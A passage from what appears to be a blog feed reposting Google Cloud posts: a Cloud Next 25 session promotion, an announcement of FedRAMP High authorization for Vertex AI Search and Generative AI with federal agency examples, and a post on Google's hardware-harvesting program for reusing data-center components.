Dai Vu, Managing Director, Marketplace & ISV GTM Programs, Google Cloud

“We’re seeing tremendous growth in solutions being bought and sold on Google Cloud Marketplace, with partners across the entire ecosystem from AI and data providers to channel partners and systems integrators all taking advantage of cloud marketplace as a route-to-market. I’m excited for my panel discussion with MongoDB, SADA, and Workday, strategic partners who will provide important insights for companies across different stages of the cloud marketplace journey. And I’m looking forward to the lightning talk on monetizing AI agents, which is an exciting next step in our AI evolution.”

Dai recommends:

PAR110: Scaling go-to-market success with Google Cloud Marketplace: Learn from the best. Gain insights from MongoDB and Workday on navigating and thriving in the Google Cloud Marketplace.
PARLT118: Monetizing AI agents on Google Cloud Marketplace: Step into the future of AI monetization. This lightning talk will illuminate the path to capitalizing on the next wave of AI innovation.

Don’t Miss Out. Register Now!

Google Cloud Next 25 is your chance to connect with industry leaders, gain actionable insights, and propel your business forward. Secure your spot today and get ready to transform your partnership with Google Cloud.

Read More for the details.

2025 03 20

GCP – Vertex AI Search and Generative AI (with Gemini) achieve FedRAMP High

Tibor Kiss Cloud, Google Cloud gcp

In the rapidly evolving AI landscape, security remains paramount. Today, we reinforce that commitment with another significant achievement: FedRAMP High authorization for Google Vertex AI Search and Generative AI on Vertex AI.

This follows our announcement earlier this week where we shared that Gemini in Workspace apps and the Gemini app are the first generative AI assistants for productivity and collaboration suites to have achieved FedRAMP High authorization. All of this builds on our prior announcement that Google Cloud achieved FedRAMP High Authorization on more than 100 additional services, which further underscores our dedication to delivering leading AI and robust security for mission-critical applications.

Generative AI on Vertex AI, our secure enterprise platform for hosting the Gemini family of models, is now FedRAMP High authorized, thereby empowering federal agencies to use AI capabilities for their needs. Vertex AI Search is a turnkey solution that enables federal agencies to achieve multimodal Google-quality search across external, internal and proprietary data. It makes discoverability of information much easier, and allows for greater transparency behind LLM operations.

For government customers, Vertex AI Search unlocks powerful capabilities for secure services delivery, including enhanced search and discovery and real-time operational advantages. For constituents, this translates to easier and more secure experience when engaging with government websites and applications.

Imagine asking a question on a government website without having to scroll through the site menu and being able to get an accurate answer quickly, based on the latest information and being able to know the source immediately.

Here’s a look at how Vertex AI Search is already making a difference for federal agencies:

The U.S. Department of State Bureau of Consular Affairs partnered with Google Public Sector and our partner TTEC to improve constituent experience on their largest public-facing website. After launching their online passport renewal in December 2024, they released their inaugural Agent Assist chatbot. Powered by Gemini and Google’s Contact Center AI (CCAI) solution, the chatbot enhances website FAQs at the travel.state.gov website.

The department rolled out Vertex AI Search to enable their constituents to quickly, easily, and accurately find travel advisories, passport information, visa information, overseas citizens services, emergency assistance, and more. These initiatives are just the beginning of a broader modernization effort, enabled by Google AI, to improve usability and access to critical information.

The National Archives and Records Administration (NARA) incorporated Vertex AI Search and Gemini into its searchable database from a subset of production data. NARA uses Gemini, complimented by sensitive data redaction tools, to enable advanced semantic search, while maintaining user friendliness and the highest standards of data privacy.

Vertex AI Search also can help research-focused agencies who manage scientific data. Multimodal capability enables researchers to search diverse datasets, including images, videos, and research papers more quickly.

Trust in sources is top of mind for researchers, specifically recitation and citations. Vertex AI’s Explainable AI capabilities ensure that responses are grounded in evidence. This reduces the risk of hallucinations and ensures fact checking. By fostering greater trust in the AI powered search, Vertex AI Search can accelerate research, discovery and breakthroughs.

Google is able to deliver powerful Gemini foundational models at a lower latency because of our superior AI infrastructure and computing capabilities. Our multimodal models capitalize on our AI infrastructure, achieving significantly lower latency as compared to other commercially available LLMs.

As public sector organizations transition from AI experimentation to essential, mission-critical applications, the importance of a comprehensive and integrated AI solution cannot be overstated. Google’s full-stack approach to AI, encompassing infrastructure, research, models, products, and platforms ensures efficiency and innovation across every facet of AI development and deployment.

This unique approach is further exemplified by our FedRAMP High authorization for Vertex AI Search and Generative AI on Vertex AI, which empowers federal agencies to confidently harness the potential of AI while maintaining the highest security and compliance standards.

Learn more about how Google’s AI solutions can empower your agency and accelerate mission impact by joining us at Google Cloud Next 2025 in Las Vegas.

Read More for the details.

2025 03 20

GCP – Harvesting hardware: Our approach to carbon-aware fleet deployment

Tibor Kiss Cloud, Google Cloud gcp

When it comes to managing the infrastructure and AI that powers Google’s products and platforms – from Search to YouTube to Google Cloud – every decision we make has an impact. Traditionally, meeting growing demands for machine capacity means deploying new machines and that has an associated embodied carbon impact. That’s why we’re working to reduce the embodied carbon impact at our data centers by optimizing machine placement and promoting the reuse of technical infrastructure hardware.

In this post, we shine a spotlight on our hardware harvesting program, an approach to fleet deployment that prioritizes the reuse of existing hardware.

The hardware harvesting program

The concept is simple: As we deploy new machines or components in our fleet, we repurpose older equipment for alternative and/or additional use cases. The harvesting program prioritizes the reuse of existing hardware, which reduces our carbon emissions compared to exclusively buying brand new machines from the market. This program also helps conserve valuable resources and minimize waste, which contributes to a more circular economy. By scrutinizing the carbon impact of deployment decisions, we’re not just reducing emissions — we’re embedding carbon considerations into the very core of our data center machine operations and business decisions.

Hardware harvesting is not without its challenges. For the program to be successful, we need to ensure the harvested machines meet the specific demands of our workloads and our customers’ requirements, which vary depending on the type of machine and its configuration. However, our heterogeneous fleet, with a wide variety of computational, storage, and accelerator machines, gives us the flexibility to find creative solutions that support both our services and our sustainability goals.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2d7998e790>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Hardware harvesting in action

Google’s harvesting program has already yielded strong benefits. By prioritizing the reuse of existing hardware, we’ve been able to optimize the use of new equipment, reduce our carbon footprint, minimize waste and lower costs.

For example, in 2024, we needed more specific models and configurations of certain components (PCBs, CPUs, motherboards, and HDDs). We harvested them from existing machines by migrating configuration-agnostic jobs from existing machines to more efficient ones, then reclaimed the components from these specific machines. In 2024, the harvesting program helped us reuse over 293,000 components to fulfill new demand, save carbon emissions, and reduce costs. Scaling this hardware harvesting approach across Google’s data center infrastructure presents an opportunity for cost, resource, and carbon reduction.

Looking ahead: Leading by example

Harvesting is just one example of how we’re embedding carbon considerations into our data center practices. We believe that these initiatives will play a role in helping us achieve our company-wide net-zero goal and build a more sustainable future for cloud computing and AI. Read our 2024 Environmental Report to learn more about our sustainability practices.

As we continue to refine our strategies, we aim to lead by example and encourage other companies, especially those in the cloud computing industry, to consider similar approaches.

Read More for the details.